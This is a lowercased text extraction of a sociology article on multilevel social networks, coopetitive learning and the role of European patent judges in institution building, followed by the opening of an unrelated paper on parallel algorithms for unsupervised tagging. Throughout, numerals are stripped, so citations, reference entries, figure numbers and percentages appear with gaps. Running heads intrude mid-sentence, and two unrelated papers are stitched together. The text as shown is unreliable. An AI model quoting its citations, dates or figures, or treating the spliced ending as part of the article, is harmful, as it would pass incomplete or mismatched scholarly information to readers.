network lift from dual alters is not only created by closing such complex paths. it is also derived from a specific kind of cumulative advantage. we pictured this -level matthew effect with a paraglider with three levels (lazega and jourda, ). incidentally, one of the questions one could ask in business schools is why managers do not create this connection with dual alters for their subordinates more often. the answer might be that this extension of opportunity structures of subordinates requires that managers do not perceive their relationship with their subordinates as cutthroat competitive. the combination of specific multilevel relational strategies by individual members and the closing of multilevel -paths by the manager can transform a latent, extended opportunity structure, into a social process that is a collective asset shared and useful to navigate the coopetitive learning process. this special dimension of opportunity structures, which we call extended opportunity structures, thus matters for navigating social processes on multilevel, socio- organizational networks. multilevel temporalities and synchronizations our second example is a study of collective learning and coopetitive survival in business , in particular among sales representatives with precarious jobs in a trade fair for regional buyers and global sellers of television programs. economists of culture show that this global industry is structured as an “oligopoly with fringes.” a small number of large multinational firms, the majors, dominate the global market using scorched-earth tactics. they empty the pockets of the largest clients, for example by selling new and successful series, such as – at the time – “the borgia,” while giving away for free, as an extra, enough hours of mickey mouse to fill the broadcasters’ grids for three hours per afternoon for an entire year. such tactics undermine the official market where thousands of smaller producers with new and creative programs have to fight for leftover crumbs. looking at this market as a multilevel structure based on the linked design helps visualize it as in figure . brailly et al. ( ) and favre et al. ( ) figure : a trade fair as epistemic and economic space represented with multilevel networks of coopetitive learning among sales representatives for contracting companies. result of successive visualizations by julien brailly, saint-clair chabert-liddell and david schoch of a discussion network among sales representatives during year (lower level) and the contract network signed the following year between the companies in which these sales representatives were affiliated (upper level). many small companies, the units on the outer upper circle, did not sign any contract that year and thus find themselves isolated on this outer upper circle, as if they were watching the economic action driven by the more central companies doing business in the centre. the density of the lower level network represents the “buzz” network of this trade fair. for color codes and for a substantive explanation of this graph, see brailly ( ; brailly et al., ). (see ‘markets as multilevel networks’ ( ) with julien brailly, guillaume favre and josiane chatellet) for a neo-structural economic sociology based on the relational work of entrepreneurs using coopetition to navigate social process in markets, see lazega and mounier ( ) and brailly et al. ( ). embarked on social processes in dynamic and multilevel networks show that it is worth network analyzing in detail how deals for the medium- and small-sized companies are initiated and designed by their respective sales representatives at the trade fair, then later trans- formed into contracts by the companies at the inter-organizational level (bathelt and glückler, ; berends et al., ). fieldwork carried out in one such trade fair shows, for example, that the smaller players survive using multilevel, coopetitive strategies that are not entirely dissimilar to the strategies of the scientists cited above. work at inter-individual level is based on personalized and cooperative advice networks (even between sales representatives working for competing companies), whereas work at inter-organizational level is based on competitive contracting networks. brailly ( ) has shown how the little fish survive through coopetitive relational strategies at their inter-individual level. survival from collective learning with coopetitors is based on sharing information at inter-individual level (this shows with triadic closure in ties among sellers) morphing into six-order multilevel, multisided, multiplex sub- structures including individuals and organizations, on the buying and selling sides. in this case of distribution of television programs, the networks reveal different structures and involve different mechanisms of tie formation. but this case also exposes a new dimension of agency in the survival strategies of the little fish, who think multilevel, mobilize multilevel status, and synchronize the different temporalities of the levels in their navigation of the process of coopetitive learning. this specific multilevel management of temporalities is thus another case in point of complementarity between levels. synchronized schedules and time scales (brailly, ) characterize the superposed temporalities of this multilevel system: a short term “see you next time this year” (at different trade fairs) temporality for individuals shows that the more individuals have recently participated in the same events, the more they exchange information with each other. longer term “see you same time next year” (at this same trade fair) temporality for organizations shows that the more organizations participate in the long run in the same events, the more they deal with each other. in this multilevel structure, complementarity and synchronization are both necessary for performance, especially for the survival of smaller sellers (after oligopolistic predatory strategies undermined the market). thus, creating international socio-organizational ties in the context of a globalized markets requires a complex multilevel process that involves and synchronizes both companies and their employees. the structures of different levels strongly influence each other and are interdependent. reframing the embeddedness paradigm with amn seems to be a fruitful approach to understand the globalization of markets. organizational and individual levels are both important in different, complementary and synchronized temporalities in this system. the long- term deal network between companies influences cooperation ties between individuals, which in return can bring new business opportunities and constraints to their companies. these dynamics are likely to be recursive, combining short term and long term temporalities and processes (quintane et al., ). also, although this sharing of leftover crumbs allows smaller players to survive, this is also the story of how big business produces a global cultural order. these coopetitive collective learning processes are at the core of the joint production of global cultural homogenization. multilevel agency in institutionalization processes this multilevel approach to organized collective agency is equivalent to a form of contextualization of networks, behavior and social processes. it has also led back to a basic sociological insight predating network analyses. just like micro, meso- and macro-levels of society, levels in the decomposition of networks (from dyads to morphology) cannot be linked purely mechanically. levels of collective agency are linked by the strategic efforts of actors to structure the context of their actions and interactions at all levels, including at the macro level of society. therefore we have argued that the contextualization of networks cannot be construed without a theory of politics. in fact identification and interpretation of multilevel relational infrastructures is intrinsic to politics. this can be shown, for example, with institutionalization processes, where actors as institutional entrepreneurs participate in normative controversies to structure the contexts of their interactions and thus to manage, for example, their cooperation dilemmas. what we call a neo-structural institutionalism explores how multilevel structure, culture and agency come together as different dimensions of these politics. this multilevel contextualization of networks and behavior has stressed overlooked structural dimensions in the structural study of politics, social change and innovation, for example by stressing the role of status inconsistencies, of collegial oligarchies, of the rhetoric of sacrifice in the management of losers, etc. (lazega, , ). more generally, in a whitian spirit, further analyses can focus on organized mobility and relational turnover (omrt) as determinants of the connections social processes that can be modeled with multilevel social network analyses. such phenomena also help contextualize social networks. therefore, our third example addresses this issue directly by studying collective learning and coopetition among institutional entrepreneurs. the latter are european judges participating in a form of elitist “social movement” lobbying to create a european transnational court to institutionalize a european-level intellectual property regime, especially for patents. these judges got involved in this political process of institution building because they saw it as their duty as citizens to participate in the construction of a new european-level legal regime for intellectual property, after politicians and governments tried and failed to do so. for other examples of such discreet regulators, especially in finance and the judiciary, (see huault et al., ; lazega and mounier, ). indeed, european governments had created a european patent in , but had failed to create the transnational court that would enforce this legal instrument by relying on a common interpretation of this european patent. the judges thought that this failure weakened europe’s capacity to innovate. it allowed large transnational companies and entire industries with patents at the core of their business model (such as the pharmaceutical and biotech industry, the semiconductors’ and digital industries, etc.) to instrumentalize the courts, engage in forum shopping (i.e. selecting the national courts and judges most favorable to their preferred outcome, case by case), and use long-lasting “zombie” patents. powerful organizations, such as a (non-eu) public/ private agency, the european patent office (epo), supported this specialized and elitist social movement. this institution awards patents to business – but is also sole regulator of this system in the absence of the transnational court. it operates with/under international private law, not eu law. a professional association, the european patent lawyers association as well as a high- level official in the brussels administration (who later became responsible for the legal department at epo) were also involved. judges, lawyers and members of epo assembled at the so-called venice forum (vf) where we collected network data in – in addition to data on perceptions, opinions and normative choices. we measured several social networks of these judges: discussion, reading decisions made by colleagues across borders, citation of decisions made by colleagues across borders in one’s own decisions; and finally recognition of european colleagues considered to be ex ante leaders personifying the future european uniform position on patents. the latter were expected to become members of the court of appeals of this jurisdiction, generating substantive interpretation of patent law and jurisprudence on which european judges would eventually align. note that this collegial oligarchy of judges, who called themselves a “conclave,” did not include representatives of civil society associations challenging patents as the right way to encourage innovation – raising the issue of “democratic deficit” of such institutionalization processes. this collegial oligarchy of institutional entrepreneurs who were also cross-level actors succeeded in pushing to the creation in of the european unified patent court (upc), a new type of judicial institution still waiting for ratifications by key european national parliaments. this vf social movement also informally selected and lifted the collegial oligarchy of super-central judges in inter-individual networks who acquired the high multilevel status that they needed to work convincingly (from the perspective of their peers) on harmonizing the common legal interpretation of the european patent: clarifying anticipations, freezing expectations, obtaining alignments on cross-level linchpins. these supercentral players are identified in figure mapping the uniform network among them. they were the most eminent among the judges in this “patent conclave,” thus expected to sit on the future court of appeal of the upc once it would become operational. as cross-level linchpins, they had enough multilevel status and the right kind of rhetoric as judicial entrepreneurs to wield influence in this transnational institution building process. here we see similar complementarities, but also conflicts, between levels: indeed in the european judicial architecture, the national judge is always the first level european judge, and national judges assembled in venice were active in their national courts at various levels (from local first level to field-level regulated by supreme courts). thus, in this case, the national judges at the vf were also multistatus, vertical linchpins who punch above their weight in collective agency, especially in regulatory, institutionalization processes (lazega, ). these actors with heterogeneous, high and inconsistent forms of status (i.e. in situations of conflicts of interests) were also thinking multilevel, with relation- ships between levels tense and contradictory, each country having historically developed its own patent law, within its own national innovation system, national legal culture and democratic division of powers. in particular, this example emphasizes the soci- alizing dimension of coopetitive learning, i.e. the fact that this process generates both epistemic and normative alignments. drawing on collective learning among themselves, they were getting to know their foreign colleagues and the ways in which they “construe the claims” of litigating parties in their embarked on social processes in dynamic and multilevel networks respective jurisdictions. based on this knowledge, these judges tried to hammer out a “harmonized” legal interpretation of the european patent – although they ended up producing a common, procedural “weak culture” (in breiger’s sense), to start creating alignments and a process of convergence and “harmonization” at the european level (lazega, a; lazega et al., ). note that high multilevel status of super-central judges in collective learning is not transformed into political capital purely mechanically. table shows an erg model of this uniform network, in which figure : the tip of a multilevel institutional iceberg: a collegial oligarchy of institutional entrepreneurs as vertical linchpins involved in coopetitive learning and selection of its ex ante leaders. network map of a eu “patent conclave”, the collegial oligarchy crafting the “european compromise”. mapping the ‘uniform’ network: “who expects whom to represent the future uniform position, if any?”. clarifying anticipations, freezing expectations, obtaining alignments on cross-level linchpins/collegial oligarchy: multistatus german, uk and dutch judges: judges with * are super-central judges. (see “learning from lobbying”, utrecht law review, ) table . winners and losers from heterogeneous types of capitalism in the europe des juges institutionalization process. level : judges level : capitalism block (see ‘collegial oligarchies in transnational institution building’, with eric quintane and sandrine casenaz, social networks , ) connections these “activist” judges who get involved in politics, who share the same rules, and who produce a new private/public transnational institution, do not necessarily look up to the same normative ex ante leaders. belonging to countries characterized by the same kind of capitalism and broadly defined legal culture have no direct effect, on their own, on selecting these normative ex ante leaders. however, the interaction effects of both variables help understand the construction of this collegial oligarchy and the need for observing and testing cross-level dependencies over time. these judges as vertical linchpin institutional entrepreneurs discreetly involved in politics were trying to promote a new private/ public transnational institution (the european upc) and to put the issue on the political agenda of the european commission. understanding their agency requires thinking in terms of dynamics of multilevel networks. whether this political process produces a new europe des juges (dehousse, ) remains to be seen. multispin: contextualizing social processes and dynamics of multilevel networks as suggested by table , the macro level and the meso level contexts jointly matter for coopetitive learning and for the selection of rules to make judicial decisions. the socio-economic and political context needed to catalyze such multilevel network dynamics is no less complex than these dynamics themselves. for example, it provides and sorts personnel (tilly, ), helps select leaders and facilitate their circulation, excludes dissenters, mixes members of different social niches, creates moments of synchronization between the dynamics of several levels influencing each other. in figure , we represent this context as a multilevel spinning top, or “multispin,” a rough metaphor of stability from movement (lazega et al., ; lazega, b, ) and of synchronization in these multilevel network dynamics. in this system judges are becoming increasingly central over time as they move across hierarchical levels. they rotate and move across jobs, which creates intense relational turnover. this combined omrt can create upward mobility for vertical linchpins (but also downward mobility for others). in turn, mobility helps create the specific multipositionaly-with-status-inconsistency that is associated with institutionalization of new norms, i.e. participation in institutional change. in this multispin as a (rather rigid) metaphor of the context facilitating the institutionalization of new norms at the transnational level, the network dynamics of selection of ex ante leaders in this collegial oligarchy indicate processes at superposed levels that co-evolve, influence each other and lead to, or undermine, synchronization. this gives us insights into the production of cross-level linchpins but also of the dynamics that push and pull them across levels. notice the stairs in the shaft of the multilevel spinning top, representing upward mobility of vertical linchpins associated with institutionalization of new norms, but also the fact that there are losers in these dynamics of multilevel networks of institutionalization. for the latter, multilevel networks lead to nowhere. the dynamics of bottom up collegiality promoting cross- level vertical linchpins can also demote them. relative structural stability regardless of membership turnover was identified in judges’ advice networks and coopetitive learning using stochastic blockmodeling and siena models (lazega et al., ; lazega et al., ), exposing a cyclical centralization− decentralization−recentralization of advice networks as stabilization provided by this multispin. this was confirmed at the inter-organizational level by brailly et al. ( ) in the study of the global trade fair in which clusters of sales representatives participating in the market were unstable over time while clusters of the companies and organizations in which these persons were affiliated were more stable. indeed high turnover at the interindividual level and the stability of the structure at the interorganizational level could figure : context as multispin providing stability from movement in multilevel relational infrastructures. multispin (multilevel spinning top) as direct context of multilevel networks, driving the organized mobility and relational turnover of their members (individuals, organizations, governments). (see ‘organized mobility and relational turnover as context for social mechanisms , in j.glückler, e.lazega & i.hammer (eds), knowledge and networks, ) level of inter-governmental network staircase for vertical linchpins level of inter-organizational network level of inter-individual network embarked on social processes in dynamic and multilevel networks be hypothesized to co-generate each other, often by dumping synchronization costs on individuals (lazega, a). the dynamics of cross-level linchpins becoming increasingly central over time and moving across hierarchical levels to institutionalize new norms across borders, these dynamics show how such multistatus and cross-level actors steer the multilevel structures that help communities navigate obstacles in key social processes. note that multispin as a metaphor also reminds us that there are many examples of such promotion and navigation processes that exclude political opponents by just making the cost of synchronization between levels too high for them. omrt as determinants of social processes can help filter, close, solidarize, lift and ratchet up a collegial oligarchy at the top. again, the more open at the bottom, the more closed at the top. these promotions can often squander the social capital of the collective. the norms and institutions that they promote may not be considered legitimate if their assumed followers do not participate in their formulation, selection and promotion. dynamic multilevel networks to explore politics in the organizational society in conclusion, the reason social processes can be navigated by relational infrastructures is that these relational infrastructures impose a form of social discipline that shapes the course on these social processes as capital of the collective. acknowledging superposed levels of collective agency and analyzing them separately and jointly focuses the attention on multilevel relational infrastructures that help revisit vertical and horizontal differentiations in society. for example, individuals active at two levels simultaneously, i.e. vertical linchpins with multilevel and inconsistent dimensions of status who punch above their weight in the political process. or multilevel social niches, i.e. combinations of roles played by members of a block of individuals at one level and the roles of a block of organizations at the other level, given affiliation ties. as seen with coopetition, processes at each level influence each other across levels, coevolve and can synchronize – although this synchronization cannot be taken for granted or assumed to be equally costly for all actors across levels. dynamics of multilevel networks is a mindbogglingly complex set of phenomena with many components moving at the same time: different kinds of actors, behaviors, interactions, relationships, attributes such as positions and affiliations, relational infrastructures, social processes, encompassing global contexts creating mobility and inequalities. the three case studies of coopetition in science (multilevel networks of researchers), in business (multilevel networks of sales representatives), and in government (multilevel networks of transnational judges as institutional entrepreneurs) help us explore aspects of this temporal multilevel social order and the implications of this approach for social network analysts today. analyses of relational infrastructures of coopetitive learning in science show that individuals and organizations are equally, but differently, important for creating and sharing new knowledge with key multilevel players. observation of multilevel relational infrastructures of coopetitive learning in business shows that synchronized temporalities of individuals and organizations are key to the building of a new global cultural order using markets. tracking multilevel relational infrastructures in lobbying shows that the construction of institutions also requires what we called “stability from movement,” this time in coopetitive learning, i.e. intense omrt as context for these multilevel relational infrastructures and, with this mobility and turnover, diverse levels of access to law – indeed in many cases too much access to law. witnessing success in the deployment of such social processes, we can be led to believe that organizations are more important than individuals. this is only true when our measurements are static; over time, individuals and their personalized relationships matter just as much, with increasing intensity of conflicts and power plays being managed with new cohorts relying on complementarity and synchronization of levels. we are just beginning to explore these dynamics of multilevel relational infrastructures in collective agency, a field of research for the future. as sug- gested by our last illustration, a better knowledge of navigation of social processes with the dynamics of multilevel networks in the organizational society helps to better understand politics and contemporary transitions, especially institutional change in the face of depleted common pool ecological resources (bodin, ) and increasing social inequalities. for example, multilevel relational infrastructures and multilevel network models of navigation of social processes can measure the extent to which democracies have become elitist and unequal, and focus on how powerful elites will behave in the coming transitions. in the context of an organizational and class society, relational data is not data like any other. it can increasingly help big relational tech (brt), i.e. relational data hegemons, identify, coopt or undermine the vertical linchpins and collegial oligarchies that dominate collective learning and connections institutionalization processes in society. social net- works touch deep and we are becoming increasingly transparent to such organizations. the concentration of power that big relational data represents because of its increasing value as indicator of social processes and their multilevel navigation has yet to be understood and to sink in. then, if power must check power, who will check these hegemons (al-amoudi and lazega, )? at least three implications follow from such questions for our academic research. first, the social construction of multilevel extensions of opportunity structures through dual alters is not just decisive for individual destinies; it is also important in the collective, political construction of the micro− meso−macro links. there are no mechanical transitions from the individual, to the dyad, to the triad, etc. until one reaches the collective with its morphological, horizontal and vertical differentiations and structures, such as multidimensional status and division of work. there is no such a mechanical transition without levels in a stratigraphy, and without multilevel strategies, including these selective extensions, in fact without millions of such extensions. these extensions and their consequences are not studied yet in spite of their obvious political importance, for example, in regulatory processes. it will be up to neo-structural sociology to show how they are created, and a special attention could be paid, for example, to how dual alters participate in anyone’s engagement in citizenship and political institutionalization of any new normal. second, evolution of multilevel relational infrastructures and social change drive each other in the organizational society, which is a class society where organizations are “tools with a life of their own” evolving in “dynamic constitutive fields” (selznick, ). in the navigation of social processes, multi- level relational infrastructures can create collegial oligarchies and democratic deficits. from “big fish in the big pond” to “cross-level linchpins” to “institutional entrepreneurs,” this often leads to rebuilding ins- titutions and societies through very discreet, techno- cratic, social and institutional engineering (such as finding/recommending/assigning the “right” alters and dual alters for any task). it is therefore part of our responsibility as social scientists to keep identifying these multilevel relational infrastructures and the elites’ ways of managing/navigating the social processes that our societies are made of: solidarities, controls, regulations and learning. for any controversial issue, in all domains, small private collegial oligarchies pop up, selected privately through sifting and lifting by multispins in every field. one of the latest was by a brt company to decide what is fake news, what is angry mood manipulation, and how to deal with them. the more we know about dynamics of multilevel networks as public scientists, the more we will be able to contribute to managing the roller coasters of these social processes in which we are embarked. therefore we need new richer data structures, more powerful network statistics to tests hypotheses on dynamic, multilevel networks. third, one implication of neo-structural research is that we need to keep collecting and criticizing our own social network datasets combining structure, culture and agency (archer, ; reynaud, ; breiger, , ; favereau and lazega, ; grossetti, ; lazega, b), and to develop network literacy along with thorough organizational, ethnographical and qualitative analyses. we should not give up designing our own research on the ground, collecting our own small and multilevel datasets, listening to how people themselves make sense of their actions, relationships, contexts, controversies, etc. if we do not measure and model these processes ourselves, only brt will, and we will no longer be able to understand these processes in the original language. we can keep learning with our small datasets, especially when big relational data is not accessible to scientists in decent conditions. this is the only way to keep the knowledge of social processes public and democratic. a hidden competition is under way between public social sciences and private social sciences to track these realities. following two generations of “governance,” collegial oligarchies of top-down collegiality emerge in many social niches making political decisions without saying so, privately de- signing changes in public institutions, not just in governments and government-related committees. public social scientists and social network analysts should not let this disappear from the sight of the wider public. much remains to be done to be useful in that respect. acknowledgments in addition to my special gratitude to lise mounier for many years of research collaboration, i would like to thank co-authors and coworkers in social and organizational network analyses: avner bar- hen, pierre barbillon, germain barré, franck bessis, dominique bouthinon, julien brailly, ulrik brandes, ronald breiger, maria-giuseppina bruna, saint-clair chabert-liddell, josiane chatellet, catherine comet, claude compagnone, bernard conein, sébastien delarre, sophie donnet, fabien eloire, ana maria falconi, olivier favereau, guillaume favre, alexis ferrand, johannes glückler, karima guenfoud, embarked on social processes in dynamic and multilevel networks ingmar hammer, isabelle huault, marie jourda, david krackhardt, david lazega, marie-odile lebeaux, claire lemercier, jaime montes, mohamed oubenal, philippa pattison, elise penalva icher, Álvaro piña- stranger, christophe prieur, eric quintane, chrystelle richard, garry robins, juliette rouchier, guillaume santini, saraï sapulete, silvio salej higgins, tom snijders, henry soldano, rafael stofer, mark tranmer, paola tubaro, marijtje van duijn, marta varanda, stéphane vari, peng wang, olivier wattebled, harrison white and aleš Žiberna. i would also like to thank julien brailly, saint-clair chabert-liddell, maud gellée, alexis gomes matias, jordan laires, jade limacher, yannis rabia, david schoch and françois tang for their work on exploring visualizations of multilevel networks. references agneessens, f. and wittek, r. . where do intra-organizational advice relations come from? the role of informal status and social capital in social exchange. social networks : – . al-amoudi, i. and lazega, e. (eds) . confronting the matrix: post-human institutions and organizations, routledge, london. archer, m. s. . morphogenesis versus structuration: on combining structure and action. british journal of sociology : – . barbillon, p., donnet, s., lazega, e. and bar- hen, a. . stochastic block-models for multiplex networks: an application to a multilevel network of researchers. journal of the royal statistical society: series a (statistics in society) : – . bathelt, h. and glückler, j. . the relational economy: geographies of knowing and learning, oxford university press, oxford. berends, h., van burg, e. and van raaij, e. m. . contacts and contracts: cross-level network dynamics in the development of an aircraft material. organization science : – . bernard, j., dausset, j. with the collaboration of a. hess. . la mosaique humaine. entretien sur les révolutions de la médecine et le devenir de l’homme, calmann-levy, paris. bodin, Ö. . collaborative environmental governance: achieving collective action in social- ecological systems. science : , p.eaan . brailly, j. . dynamics of multi-level networks in trade fairs – a local approach to the cooperation among competitors. journal of economic geography : – . brailly, j., favre, g., chatellet, j. and lazega, e. . embeddedness as a multilevel problem: a case study in economic sociology. social networks : – . brailly, j., comet, c., delarre, s., eloire, f., favre, g., lazega, e., mounier, l., montes-lihn, j., oubenal, m., penalva-icher, e., piña-stranger, Á. and varanda, m. . neo-structural economic sociology beyond embeddedness: relational infrastructures and social processes in markets and market institutions. economic sociology: the european electronic newsletter : – . breiger, r. l. . the duality of persons and groups. social forces : – . breiger, r. l. (ed.) . social mobility and social structure, cambridge university press, cambridge. breiger, r. l. . dualities of culture and structure: seeing through cultural holes. in fuhse, j. and mützel, s. (eds), relationale soziologie: zur kulturellen wende der netzwerkforschung, springer verlag, wiesbaden, pp. – . burt, r. s. . brokerage and closure. an introduction to social capital oxford university press, oxford. burt, r. s. and merluzzi, j. . “embedded brokerage: hubs versus locals”, in brass, d. j., labianca, g. (joe), mehra, a., halgin, d. s. and borgatti, stephen p. (eds), research in the sociology of organizations, emerald group publishing limited, pp. – . coleman, j. s. . the asymmetric society, syracuse university press, syracuse, ny. coromina soler, l., coenders, g., ferligoj, a. and guia, j. . phd students’ research group social capital in two countries: a clustering approach with duocentred network measures. metodološki zvezki : – . dehousse, r. . l’europe par le droit. critique internationale : – . eloire, f. . une approche sociologique de la concurrence sur un marché le cas.des restaurateurs lillois. revue française de sociologie, ( ): – . eloire, f., elise penalva-icher et e. lazega . “les réseaux complets en questions: apports et limites de l’analyse des réseaux sociaux en milieu interorganisationnel”, terrains & travaux, : – . fararo, t. j. and doreian, p. . tripartite structural analysis: generalizing the breiger-wilson formalism. social networks : – . favereau, o. and lazega, e. (eds) . conventions and structures in economic organization: markets, networks, and hierarchies, edward elgar publishing, cheltenham. favre, g., brailly, j., chatellet, j. and lazega, e. . inter-organizational network influence on long- term and short-term inter-individual relationships: the case of a trade fair for tv programs distribution in sub-saharan africa. in lazega, e. and snijders, t. a. b. (eds), multi-level network analysis for the social sciences, springer, cham, pp. – . glückler, j., lazega, e. and hammer, i. (eds) . knowledge and networks, vol. springer, cham. connections grossetti, m. . l’espace à trois dimensions des phénomènes sociaux. echelles d’action et d’analyse. sociologies, available at: http://sociologies.revues.org/ index .html huault, i., lazega, e. and richard, ch. . introduction: the discreet regulator. in huault, i. and richard, c. h. (eds), finance: the discreet regulator, palgrave macmillan, london, pp. – . koskinen, j., broccatelli, c., wang, p. and robins, g. . bayesian analysis of erg models for multilevel, multiplex, and multilayered networks with sampled or missing data. in petrucci, a., racioppi, f. and verde, r. (eds), convegno della società italiana di statistica, springer, cham, pp. – . krackhardt, d. . assessing the political landscape: structure, cognition, and power in organizations. admi- nistrative science quarterly : – . lazega, e. . analyse de réseaux et sociologie des organisations. revue française de sociologie : – . lazega, e. . the collegial phenomenon: the so- cial mechanisms of cooperation among peers in a cor- porate law partnership, oxford university press, oxford. lazega, e. a. learning from lobbying: mapping judicial dialogue across national borders among european intellectual property judges. utrecht law review, ( ): – . lazega, e. b. sociologie néo-structurale. in keucheyan et, r. and bronner, g. (eds), introduction à la théorie sociale contemporaine presses universitaires de france, paris, pp. – . lazega, e. . appropriateness and structure in organizations: secondary socialization through dynamics of advice networks and weak culture. in brass, d. j., labianca, g. (joe), mehra, a., halgin, d. s. and borgatti, stephen p. (eds), volume on contemporary perspectives on organizational social networks, research in the sociology of organizations, emerald, somerville, ma, pp. – . lazega, e. a. synchronization costs in the organizational society: intermediary relational infrastructures in the dynamics of multilevel networks. in lazega, e. and snijders, t. (eds), multilevel network analysis for the social sciences: theory, methods and applications, springer, dordrecht, pp. – . lazega, e. b. joint ‘anormative’ regulation from status inconsistency: a multilevel spinning top model of specialized institutionalization. in archer, m. s. (ed.), anormative regulation in the morphogenic society, springer, cham, pp. – . lazega, e. . organized mobility and relational turnover as context for social mechanisms: a dynamic invariant at the heart of stability from movement. in glückler, j., lazega, e. and hammer, i. (eds), knowledge and networks, springer, cham, pp. – . lazega, e. . networks and institutionalization: a neo-structural approach. connections : – . lazega, e. . bureaucracy, collegiality and social change: redefining organizations with multilevel relational infrastructures, edward elgar publishers, cheltenham. lazega, e. and mounier, l. . interlocking judges: on joint (exogenous and self) governance of markets. research in the sociology of organizations, : – . lazega, e. and mounier, l. . networks of institutional capture. in vedres, b. and scotti, m. (eds), networks in social policy problems, cambridge university press, cambridge, pp. – . lazega, e. and snijders, t. a. b. (eds) . multilevel network analysis for the social sciences: theory, methods and applications, springer, dordrecht. lazega, e., lemercier, c. and mounier, l. . a spinning top model of formal structure and informal behaviour: dynamics of advice networks in a commercial court. european management review : – . lazega, e., sapulete, s. and mounier, l. . structural stability regardless of membership turnover? the added value of blockmodelling in the analysis of network evolution. quality & quantity : – . lazega, e., jourda, m.-th, mounier, l. and stofer, r. . catching up with the big fish in the big pond? multi-level network analysis through linked design. social networks : – . lazega, e. and jourda, m.-th. . the structural wings of matthew effects: the contribution of three-level network data to the analysis of cumulative advantage. methodological innovation : – . lazega, e., jourda, m.-th. and mounier, l. . network lift from dual alters: extended opportunity structures from a multilevel and structural perspective. european sociological review : – . lazega, e., bar-hen, a., barbillon, p. and donnet, s. . effects of competition on collective learning in advice networks. social networks : – . lazega, e., quintane, e. and casenaz, s. . collegial oligarchy and networks of normative align- ments in transnational institution building. social networks, : – . lindenberg, s. . grounding groups in theory: functional, cognitive, and structural interdepedencies. in markovsky, b. lovaglia, m. j. and troyer, l. (eds), advances in group processes, , jai press, greenwich, ct, pp. – . oubenal, m. . la légitimation des produits financiers, editions ems, paris. parcel, t. l., kaufman, r.l. and leeann, j. . going up the ladder: multiplicity sampling to create linked macro-to-micro organizational samples. in marsden, p. (ed.), sociological methodology, basil blackwell, oxford, pp. – . pattison, p. and wasserman, s. . logit models and logistic regressions for social networks: ii. multivariate relations. british journal of mathematical and statistical psychology : – . embarked on social processes in dynamic and multilevel networks penalva-icher, É. . amitié et régulation par les normes. revue française de sociologie : – . perrow, c. . a society of organizations. theory and society : – . pina-stranger, a. and lazega, e. . bringing personalized ties back in: their added value for biotech entrepreneurs and venture capitalists in inter- organizational networks. the sociological quarterly, : – . presthus, r. . the organizational society, knopf, new york, ny. quintane, e., pattison, p. e., robins, g. l. and mol, j. m. . short-and long-term stability in organizational networks: temporal structures of project teams. social networks : – . reynaud, j. -d. . les règles du jeu: l’action collective et la régulation sociale, armand colin, paris. selznick, p. h. . tva and the grass roots: a study in the sociology of formal organizations, university of california press, berkeley, ca. selznick, p. h. . leadership in administration, row, peterson & co, evanston, il. snijders, t. a. b. . stochastic actor-oriented models for network change. journal of mathematical sociology : – . snijders, t. a. b. . models for longitudinal network data. chapter . in carrington, p., scott, j. and wasserman, s. (eds), models and methods in social network analysis, cambridge university press, new york, ny, pp. – . snijders, t. a. b. . the multiple flavours of multilevel issues for networks. in lazega, e. and snijders, t. a. b. (eds), multilevel network analysis: theory, methods and applications, springer, cham, pp. – . snijders, t. a. b. and bosker, r. j. . multilevel analysis: an introduction to basic and advanced multilevel modeling, nd ed., sage publishers, london. snijders, t. a. b. and steglich, c. e. g. (forthcoming). social network dynamics by examples, cambridge university press, cambridge. snijders, t. a. b., pattison, p. e., robins, g. l. and handcock, m. s. . new specifications for exponential random graph models. sociological methodology : – . tilly, c. h. . durable inequality, university of california press, berkeley, ca. tilly, c. h. . changing forms of inequality. sociological theory : – . tranmer, m., pallotti, f. and lomi, a. . the embeddedness of organizational performance: multiple membership multiple classification models for the analysis of multilevel networks. social networks : – . van duijn, m. a., snijders, t. a. and zijlstra, b. j. . p : a random effects model with covariates for directed graphs. statistica neerlandica : – . wang, p., robins, g., pattison, p. and lazega, e. . exponential random graph models for multilevel networks. social networks, : – . wang, p., robins, g., pattison, p. and lazega, e. . social selection models for multilevel networks. social networks, : – . wasserman, s. and iacobucci, d. . statistical modelling of one-mode and two-mode networks: simultaneous analysis of graphs and bipartite graphs. british journal of mathematical and statistical psychology : – . wasserman, s. and robins, g. . an introduction to random graphs, dependence graphs, and p*. models and methods in social network analysis : – . weber, m. . economy and society, edited by g. roth and c. wittich, university of california press, berkeley, (first edition ). white, h. c. . chains of opportunity: system models of mobility in organizations, harvard university press, cambridge. white, h. c., boorman, s. c. and breiger, r. l. . social structure from multiple networks. i. blockmodels of roles and positions. american journal of sociology : – . wittek, r. . intra-organizational networks. in alhajj, r. and rokne, j. (eds), encyclopedia of social network analysis and mining, nd ed., springer, new york, ny. wittek, r. and van de bunt, g. g. . post- bureaucratic governance, informal networks and oppositional solidarity in organizations. the netherlands’ journal of social sciences : – . wittek, r. and van witteloostuijn, v. . rational choice and organizational change. in wittek, r., snijders, t. a. and nee, v. (eds), the handbook of rational choice social research, stanford university press, palo alto, ca, pp. – . zappa, p. and lomi, a. . the analysis of multilevel networks in organizations: models and empirical tests. organizational research methods : – . Žiberna, a. . blockmodeling of multilevel networks. social networks : – . Žiberna, a. and lazega, e. . role sets and division of work at two levels of collective agency: the case of blockmodeling a multilevel (inter-individual and inter-organizational) network. in lazega, e. and snijders, t. (eds), multilevel network analysis: theory, methods and applications, springer, dordrecht. ziherl, p., iglic, h. and ferligoj, a. . research groups’ social capital: a clustering approach. metodoloski zvezki : . parallel algorithms for unsupervised tagging sujith ravi google mountain view, ca sravi@google.com sergei vassilivitskii google mountain view, ca sergeiv@google.com vibhor rastogi∗ twitter san francisco, ca vibhor.rastogi@gmail.com abstract we propose a new method for unsupervised tagging that finds minimal models which are then further improved by expectation max- imization training. in contrast to previous approaches that rely on manually specified and multi-step heuristics for model minimiza- tion, our approach is a simple greedy approx- imation algorithm dmlc (distributed- minimum-label-cover) that solves this objective in a single step. we extend the method and show how to ef- ficiently parallelize the algorithm on modern parallel computing platforms while preserving approximation guarantees. the new method easily scales to large data and grammar sizes, overcoming the memory bottleneck in previ- ous approaches. we demonstrate the power of the new algorithm by evaluating on various sequence labeling tasks: part-of-speech tag- ging for multiple languages (including low- resource languages), with complete and in- complete dictionaries, and supertagging, a complex sequence labeling task, where the grammar size alone can grow to millions of entries. our results show that for all of these settings, our method achieves state-of-the-art scalable performance that yields high quality tagging outputs. introduction supervised sequence labeling with large labeled training datasets is considered a solved problem. for ∗∗the research described herein was conducted while the author was working at google. instance, state of the art systems obtain tagging ac- curacies over % for part-of-speech (pos) tagging on the english penn treebank. however, learning accurate taggers without labeled data remains a chal- lenge. the accuracies quickly drop when faced with data from a different domain, 